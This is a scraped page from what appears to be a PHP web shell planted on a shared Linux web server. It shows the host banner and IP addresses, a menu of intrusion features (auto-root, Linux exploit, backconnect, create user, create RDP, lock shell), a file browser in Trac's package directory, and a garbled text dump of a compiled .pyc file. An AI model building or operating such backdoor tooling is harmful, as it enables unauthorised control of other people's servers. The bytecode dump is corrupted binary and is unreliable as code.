Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
trac /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
308
B
-rw-r--r--
about.cpython-310.pyc
2.17
KB
-rw-r--r--
api.cpython-310.pyc
2.52
KB
-rw-r--r--
attachment.cpython-310.pyc
37.13
KB
-rw-r--r--
cache.cpython-310.pyc
8.51
KB
-rw-r--r--
config.cpython-310.pyc
34.04
KB
-rw-r--r--
core.cpython-310.pyc
9.46
KB
-rw-r--r--
db_default.cpython-310.pyc
9.88
KB
-rw-r--r--
dist.cpython-310.pyc
17.25
KB
-rw-r--r--
env.cpython-310.pyc
39.39
KB
-rw-r--r--
loader.cpython-310.pyc
7.08
KB
-rw-r--r--
log.cpython-310.pyc
1.63
KB
-rw-r--r--
perm.cpython-310.pyc
29.99
KB
-rw-r--r--
resource.cpython-310.pyc
15.14
KB
-rw-r--r--
test.cpython-310.pyc
19.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : perm.cpython-310.pyc
o �k�`�� � @ s| d dl Z d dlZd dlmZ d dlmZmZmZ d dlm Z d dl mZmZ d dl T d dlmZmZ d dlmZmZ d d lmZ d d lmZmZmZmZmZmZ d dlmZmZ g d�Z G d d� de!�Z"G dd� de#�Z$G dd� de%�Z&G dd� de%�Z'G dd� de%�Z(G dd� de%�Z)G dd� de*�Z+G dd� de*�Z,G dd� de*�Z-G dd � d e*�Z.G d!d"� d"e/�Z0G d#d$� d$e*�Z1dS )%� N)�groupby)�AdminCommandError�IAdminCommandProvider�get_dir_list)�cached)�ExtensionOption�OrderedExtensionsOption)�*)�Resource�get_resource_name)�file_or_std�lazy)�time_now)�path_to_unicode�print_table�printout�stream_encoding� to_unicode�wrap)�_�N_)�IPermissionRequestor�IPermissionStore�IPermissionPolicy�IPermissionGroupProvider�PermissionError�PermissionSystemc s6 e Zd ZdZed�Zd� fdd� Zedd� �Z� Z S ) r z2Insufficient permissions to perform the operation.� ForbiddenNc sr || _ || _|| _| j r)| jr!| jjr!td| j t| j| j�d�}ntd| j d�}n|d u r1td�}t� �|� d S )Nzt%(perm)s privileges are required to perform this operation on %(resource)s. You don't have the required permissions.)�perm�resourcezd%(perm)s privileges are required to perform this operation. You don't have the required permissions.)r z2Insufficient privileges to perform this operation.)�actionr �env�idr r �super�__init__)�selfr r r! �msg�� __class__� �+/usr/lib/python3/dist-packages/trac/perm.pyr$ + s ��zPermissionError.__init__c C s | j d S �Nr )�args�r% r) r) r* �message>